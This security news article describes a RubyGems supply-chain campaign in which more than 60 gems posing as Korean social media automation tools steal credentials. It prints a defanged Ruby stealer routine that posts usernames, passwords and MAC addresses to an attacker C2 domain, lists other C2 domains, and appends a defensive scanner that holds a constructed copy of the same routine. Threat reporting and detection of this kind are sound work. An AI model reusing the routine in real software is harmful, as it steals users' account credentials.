RubyGems Malware Attack Weaponizes 60+ Packages to Steal Credentials from Social Media and Marketing Tools
Threat actors began slipping malicious code into legitimate RubyGems packages, disguising infostealers as social media automation tools in early 2023.
Over the past two years, attackers operating under aliases such as zon, nowon, kwonsoonje, and soonje have published more than 60 gems that deliver promised automation features—bulk posting, engagement amplification, and backlink creation—while covertly harvesting credentials.
These packages target platforms including Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver, and have been downloaded over 275,000 times, with installs persisting on machines long after individual gems are removed from the public index.
Socket.dev analysts noted that each malicious gem incorporates a lightweight graphical interface built with Glimmer-DSL-LibUI, presented in Korean to appeal to South Korean grey-hat marketers.
Upon launch, users encounter prompts labeled “아이디” (ID) and “비밀번호” (password), encouraging entry of account credentials under the guise of legitimate login for automation services.
Instead of forwarding these details to official APIs, the gems immediately exfiltrate credentials and host MAC addresses to attacker-controlled servers via HTTP POST requests.
The domains programzon[.]com, appspace[.]kr, marketingduo[.]co[.]kr, and seven1.iwinv[.]net host PHP bulletin board endpoints that silently accept stolen data.
The campaign’s evolution demonstrates a sophisticated supply chain compromise. Gems published under the zon alias are often “yanked”—removed from RubyGems—within days, only to be mirrored in continuous integration caches and redistributed under new names by the same actor.
Despite periodic infrastructure shifts, the core credential-stealing routine remains unchanged, enabling persistent fingerprinting of infected hosts.
This approach leverages grey-hat marketers’ reliance on disposable accounts; victims rarely report breaches, opting instead to abandon compromised identities and continue operations without suspicion.
Infection Mechanism and Exfiltration Workflow
The malicious iuz-64bit gem exemplifies the infection mechanism shared across the cluster.
After presenting its GUI, the gem invokes a function that collects user input and system identifiers before performing an HTTP POST to the attacker’s C2 endpoint.
The defanged Ruby snippet below illustrates the process (the C2 domain is defanged to match the indicators above; get_mac_address is the gem's own helper and is not reproduced here):

    require 'http'   # the gem uses the `http` client gem for the POST
    require 'json'

    # Credential-stealing routine from the iuz-64bit gem (defanged copy)
    def login_check2(user_id, user_pw)
      url = "https://programzon[.]com/auth/program/signin" # C2 endpoint (defanged)
      headers = { 'Content-Type' => 'application/json' }
      mac = get_mac_address() # host MAC address, lets the actor fingerprint each install
      body = {
        username: user_id,
        password: user_pw,
        macAddress: mac,
        program: '인스타 자동 포스팅(업로드) 프로그램' # "Instagram auto posting (upload) program"
      }.to_json
      # The credentials and host identifier go to the attacker's server, never to Instagram
      response = HTTP.post(url, headers: headers, body: body)
      payload = JSON.parse(response.body.to_s)
      payload['status'] == "0" ? "0" : payload['message']
    end
Once credentials and MAC addresses reach the C2 server, the attacker can correlate installations across various gem clusters, track tool distribution, and maintain long-term access.
This dual-use model empowers grey-hat marketers to automate spam and SEO campaigns while surreptitiously funneling sensitive data to the threat actor.
As the campaign persists, defenders must integrate real-time dependency scanning and install-time alerts to detect and block these malicious packages before they infiltrate development environments.
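As an added example of the install-time scanning recommended above (this is not code from the Socket.dev report or from any of the gems it describes), the Ruby script below walks an unpacked gem directory and flags source files that combine the three behaviours the article documents: a credential prompt, MAC-address collection, and an HTTP POST, with the report's four C2 domains treated as a decisive indicator on their own. The sample sources it scans are constructed for the demonstration; the regexes, thresholds and the `scan_source` / `scan_gem_dir` names are this example's own choices, not anything from the campaign.

```ruby
# Added example: static triage of an unpacked gem for the credential-exfiltration
# pattern described in the article. Not code from the report or the malicious gems.
require 'find'
require 'tmpdir'

# Defanged C2 domains taken from the report; refanged at load time for matching.
C2_DOMAINS = [
  'programzon[.]com',
  'appspace[.]kr',
  'marketingduo[.]co[.]kr',
  'seven1.iwinv[.]net'
].map { |d| d.gsub('[.]', '.') }.freeze

# Behavioural indicators (this example's own heuristics), each run over file contents.
INDICATORS = {
  credential_prompt: /(비밀번호|password)/i,            # Korean or English password field
  mac_collection:    /mac_?address|macaddr|getmac|ifconfig|ip link/i,
  http_post:         /\bHTTP\.post\b|Net::HTTP\.post|post_form|\.post\(/
}.freeze

# Escape dots so "programzon.com" does not match "programzonXcom".
C2_REGEX = Regexp.union(C2_DOMAINS.map { |d| Regexp.new(Regexp.escape(d), Regexp::IGNORECASE) })

# Scan one Ruby source string and return the indicators hit, any C2 domains seen, and a verdict.
def scan_source(src)
  hits = INDICATORS.select { |_, re| src.match?(re) }.keys
  domains = src.scan(C2_REGEX).map(&:downcase).uniq
  verdict =
    if domains.any?                      then :known_c2   # a listed C2 domain is enough alone
    elsif hits.size == INDICATORS.size   then :suspicious # all three behaviours together
    else :clean
    end
  { indicators: hits, c2_domains: domains, verdict: verdict }
end

# Walk an unpacked gem tree (e.g. the output of `gem unpack foo.gem`) and report
# every .rb file whose verdict is not :clean, keyed by path relative to the root.
def scan_gem_dir(dir)
  results = {}
  Find.find(dir) do |path|
    next unless File.file?(path) && path.end_with?('.rb')
    r = scan_source(File.read(path, encoding: 'UTF-8'))
    results[path.sub("#{dir}/", '')] = r unless r[:verdict] == :clean
  end
  results
end

# Constructed sample mirroring the shape of the login_check2 routine shown above.
SAMPLE_MALICIOUS = <<~RUBY
  def login_check2(user_id, user_pw)
    url = "https://#{C2_DOMAINS.first}/auth/program/signin"
    mac = get_mac_address()
    body = { username: user_id, password: user_pw, macAddress: mac }.to_json
    HTTP.post(url, headers: { 'Content-Type' => 'application/json' }, body: body)
  end
RUBY

# Constructed benign sample: posts JSON but collects no credentials or host identifiers.
SAMPLE_BENIGN = <<~'RUBY'
  def report_metrics(count)
    HTTP.post("https://example.invalid/metrics", body: { count: count }.to_json)
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir do |dir|
    File.write(File.join(dir, 'login.rb'), SAMPLE_MALICIOUS)
    File.write(File.join(dir, 'metrics.rb'), SAMPLE_BENIGN)
    scan_gem_dir(dir).each do |file, r|
      puts "#{file}: #{r[:verdict]} indicators=#{r[:indicators]} c2=#{r[:c2_domains]}"
    end
  end
end
```

Run it against a directory produced by `gem unpack` before the gem is allowed into a build; the domain list is the part to keep current, since the report notes the actor rotates infrastructure while the stealer routine itself stays the same, which is why the three-behaviour heuristic is kept alongside the domain match.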